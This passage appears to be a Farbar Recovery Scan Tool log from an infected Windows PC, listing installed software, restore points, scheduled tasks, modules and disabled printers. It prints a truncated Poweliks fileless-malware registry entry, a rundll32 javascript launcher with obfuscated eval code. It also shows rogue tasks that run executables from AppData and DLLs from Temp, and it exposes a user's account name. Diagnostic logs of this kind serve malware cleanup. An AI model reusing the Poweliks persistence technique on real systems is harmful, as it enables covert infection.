(Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) HiddenCCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help English (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help French (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help German (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Italian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Korean (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Polish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Thai (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hiddenccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hiddenccc-utility (Version: 2007.0731.2234.38497 - ATI) HiddenCCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)Destination Component (Version: 110.0.0.0 - Hewlett-Packard) 
HiddenDeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) HiddenDocMgr (Version: 120.0.000.000 - Hewlett-Packard) HiddenDocProc (Version: 12.0.0.0 - Hewlett-Packard) HiddenEDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )Fax (Version: 120.0.194.000 - Hewlett-Packard) HiddenFeedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) HiddenHP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) HiddenHPSSupply (Version: 120.0.194.000 - Hewlett-Packard) HiddenHTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) HiddenMediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - 
Dell)Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) HiddenMicrosoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) HiddenMicrosoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) HiddenMicrosoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Security Client (Version: 2.1.1116.0 - Microsoft 
Corporation) HiddenMicrosoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)Network (Version: 120.0.194.000 - Hewlett-Packard) HiddenOCR Software by I.R.I.S. 
12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)ProductContext (Version: 50.0.165.000 - Hewlett-Packard) HiddenQuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )Roxio Creator Audio (Version: 3.7.0 - Roxio) HiddenRoxio Creator Copy (Version: 3.7.0 - Roxio) HiddenRoxio Creator Data (Version: 3.7.0 - Roxio) HiddenRoxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)Roxio Creator DE (Version: 3.7.0 - Roxio) HiddenRoxio Creator Tools (Version: 3.7.0 - Roxio) HiddenRoxio Express Labeler 3 (Version: 3.2.1 - Roxio) HiddenRoxio Update Manager (Version: 6.0.0 - Roxio) HiddenSAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) HiddenScan (Version: 12.0.0.0 - Hewlett-Packard) HiddenShop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)Skins (Version: 2007.0731.2234.38497 - ATI) HiddenSmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) HiddenSolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) HiddenSpelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)Status (Version: 120.0.194.000 - Hewlett-Packard) HiddenToolbox (Version: 120.0.194.000 - Hewlett-Packard) HiddenTransporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)TrayApp (Version: 
120.0.194.000 - Hewlett-Packard) HiddenUnloadSupport (Version: 11.0.0 - Hewlett-Packard) HiddenUpdate for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) 
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

25-07-2014 04:00:07 Scheduled Checkpoint
29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2014-08-23 14:19 - 2014-08-23 14:19 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} -
System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

(If an entry is included in the fixlist, the task
(.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

==================== Loaded Modules (whitelisted) =============

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2008-08-06 15:17 - 2007-08-20 01:08 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will
be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device".
This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 1022n
Description: HP LaserJet 1022n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6940 series
Description: Deskjet 6940 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled.
(Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: hp LaserJet 2420
Description: hp LaserJet 2420
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet CP1025nw
Description: HP LaserJet CP1025nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 200 color M251nw
Description: HP LaserJet 200 color M251nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled.
(Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
